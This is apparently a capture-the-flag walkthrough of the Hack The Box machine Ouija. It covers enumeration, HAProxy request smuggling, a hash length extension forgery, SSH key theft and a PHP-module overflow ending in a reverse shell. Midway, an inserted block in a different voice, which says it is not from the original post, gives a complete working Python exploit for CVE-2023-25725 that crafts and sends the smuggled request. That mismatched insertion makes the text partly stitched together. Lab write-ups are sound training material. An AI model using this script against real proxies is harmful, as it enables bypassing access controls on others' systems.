In this post, I would like to share a walkthrough of the Ouija machine from Hack The Box.
Ouija is rated as an Insane machine on Hack The Box.
What will you gain from the Ouija machine?
For the user flag, we abuse an HTTP request smuggling vulnerability in HAProxy to reach a development site that the proxy is intended to block. That site exposes enough information about the API to perform a hash length extension attack and obtain a valid admin key for the API. With this key, we can use the API to read files from the system, including an SSH private key, which gives us an initial foothold.
For the root flag, we exploit a custom PHP module, written in C and compiled into a .so file, that contains an integer overflow vulnerability. The overflow lets us overwrite variables on the stack, which ultimately gives an arbitrary write as root on the system.
Information Gathering on Ouija Machine
Once the VPN connection is up (the configuration file is downloaded from Hack The Box), we can start with an Nmap scan:
┌─[darknite@parrot]─[~/Documents/htb/ouija]
└──╼ $nmap -sV -sC 10.10.11.244 -oA initial
Starting Nmap 7.93 ( https://nmap.org ) at 2024-05-17 21:44 EDT
Nmap scan report for 10.10.11.244
Host is up (0.26s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 6ff2b4ed1a918d6ec9105171d57c49bb (ECDSA)
|_ 256 dfddbcdc570d98af0f882f73334862e8 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.71 seconds
┌─[darknite@parrot]─[~/Documents/htb/ouija]
└──╼ $
Let's access the web interface on port 80.
It only shows the Apache2 default page.
The Nmap output also shows port 3000 open, running a Node.js Express application that returns JSON.
Since the default page gives us nothing to work with, we enumerate further with gobuster.
Gobuster finds /server-status, Apache's mod_status page, which is exposed on the machine.
The request list on the server-status page caught my attention: it shows the paths (and the virtual host) that other clients are requesting, which gives us directories to investigate later.
Access the website using the domain name
Accessing the site through the hostname ouija.htb (added to /etc/hosts) shows the actual web application.
At least the Team section gives us some potential usernames.
Let's submit a message through the site's form and look at the response.
Sadly, nothing in the response looks interesting.
Next, let's enumerate the application on port 3000, which is exposed to the public. The first gobuster run fails with an error because the server answers every path the same way.
To work around that, we add the --wildcard switch at the end of the gobuster command.
A few of the discovered endpoints look interesting, so let's try them on the application.
The endpoint that caught my attention requires several parameters to be supplied.
Enumerate possible subdomains on the Ouija machine
The first wordlist yields nothing of interest.
Switching to a larger wordlist gives a lot more results.
One subdomain in particular caught my attention.
Accessing dev.ouija.htb returns a 403 Forbidden error.
The subdomain gitea.ouija.htb redirects us to a Gitea main page.
There is one repository we can look into, belonging to the user Leila.
Nothing in the repository looks suspicious at first glance.
Scrolling down, however, I noticed that the repository references HAProxy version 2.2.16, which looked new to me.
For those who are not familiar with the vulnerability affecting HAProxy 2.2.16, here is the relevant background:
Apache listens internally on port 8080, and the HAProxy reverse proxy in front of it, version 2.2.16 according to the repository, is vulnerable to HTTP request smuggling (GHSA-h2p2-w857-329f / CVE-2023-25725). Its HTTP/1 header parser accepts an empty header field name, which truncates the list of headers the proxy processes and forwards, so headers placed after it (such as Content-Length) disappear. This can be used to bypass access control rules such as the one that returns 403 for dev.ouija.htb.
Requesting dev.ouija.htb directly does not work, as shown above, so let's work around the block using the smuggling vulnerability.
Using the smuggled requests, I found two files on the dev site that we can investigate further.
Let's analyze the source code, which we can use to proceed to the next stage.
Reading /proc/self/environ through the file-read functionality exposes the potential username (leila).
Sadly, we cannot retrieve /etc/passwd at this point.
After adjusting the Content-Length header, it works like a charm!
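To make the smuggling step concrete, here is an added Python example (my own illustration, not code from the original post, from HAProxy or from the box). It builds a request in the shape CVE-2023-25725 allows, sends it to the proxy and lists the status lines that come back. The hosts ouija.htb and dev.ouija.htb and the target IP are taken from the post; the POST wrapper, the `/` path requested on the dev site and the header order are assumptions that you should adjust against your own target.

```python
"""Craft a CVE-2023-25725 style smuggled request against an HAProxy front end.

Added example, not code from the post or from HAProxy.  Assumed: the outer
POST wrapper, the header order, and the path requested on the dev site.
"""
import socket


def build_smuggled_request(front_host: str, inner_request: bytes) -> bytes:
    """Wrap inner_request so it rides past HAProxy's host-based ACL.

    Before the fix, HAProxy's HTTP/1 parser accepted an empty header field
    name and stopped building the forwarded header list at that point.  With
    Content-Length placed after the empty-name line, the proxy consumes the
    body as part of this request but the backend never sees a Content-Length,
    so Apache parses the body bytes as a second request that the ACL never
    examined.
    """
    lines = [
        b"POST / HTTP/1.1",
        b"Host: " + front_host.encode(),
        b":",  # empty field name: the bug that truncates HAProxy's header list
        b"Content-Length: " + str(len(inner_request)).encode(),
        b"",
    ]
    return b"\r\n".join(lines) + b"\r\n" + inner_request


def send_raw(host: str, port: int, payload: bytes, timeout: float = 5.0) -> bytes:
    """Send raw bytes and collect everything the proxy returns before it closes."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(payload)
        try:
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks)


def split_responses(raw: bytes) -> list:
    """Heuristic: return the status line of every HTTP/1.1 response in raw.

    Two entries (the outer request's answer followed by the dev site's) show
    that the smuggled request was answered.
    """
    return [part.split(b"\r\n", 1)[0].decode(errors="replace")
            for part in raw.split(b"HTTP/1.1 ")[1:]]


if __name__ == "__main__":
    # The path on the dev site is a placeholder; the post does not name one.
    inner = b"GET / HTTP/1.1\r\nHost: dev.ouija.htb\r\n\r\n"
    payload = build_smuggled_request("ouija.htb", inner)
    print(payload.decode())
    print(split_responses(send_raw("10.10.11.244", 80, payload)))
```

The script sets Content-Length to exactly the length of the inner request; the post notes that this value had to be adjusted before the smuggled request was answered, so if you add or remove headers in the inner request, the length must follow. If only one status line comes back, the backend's second response may be delivered on the next request over the same connection.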
Let's do some research on the hash length extension attack, which can be read about here. In short, Merkle-Damgard hashes such as MD5, SHA-1 and SHA-256 let anyone who knows H(secret || message) and the length of the secret compute H(secret || message || padding || extra) without ever learning the secret.
Another resource on the technique can be used here to escalate further.
Using hash_extender, which can be downloaded here, we generate the forged ihash and identification values.
With the forged admin key, we use the API's file-read functionality to obtain the user's SSH private key and copy it to our machine.
The user flag can also be read with the same method.
Finally, we have successfully logged in to the machine as leila.
We can read the user flag by typing the "cat user.txt" command.
Escalate to Root Privileges Access
As usual, we check for sudo privileges, but it fails because sudo asks for leila's password, which we do not have.
Let's look at the ports listening on the machine; one of them looks unusual and is only bound locally.
Therefore, let's set up port forwarding to reach it from our machine.
The forwarded service shows what looks like a normal login page.
Let's try common credentials such as admin:admin.
Sadly, nothing interesting appears in the response.
One directory on the machine looks different from the usual ones.
After looking at that directory, I noticed one file we need to investigate further.
The screenshot above shows the source code of index.php.
It loads a custom PHP extension, a compiled .so file, which is the file we should investigate more deeply.
Let’s download the file into our machine
We can download it using pwncat-cs
Let’s analyze the file using Ghidra
We run the command shown above to proceed with the escalation.
Let's craft the overflow payload as shown in the screenshot above.
Then we send the payload to the service via Burp Suite.
The injected command executes like a charm.
Finally, we managed to retrieve the reverse shell connection back to us
We can read the root flag by typing the “cat root.txt” command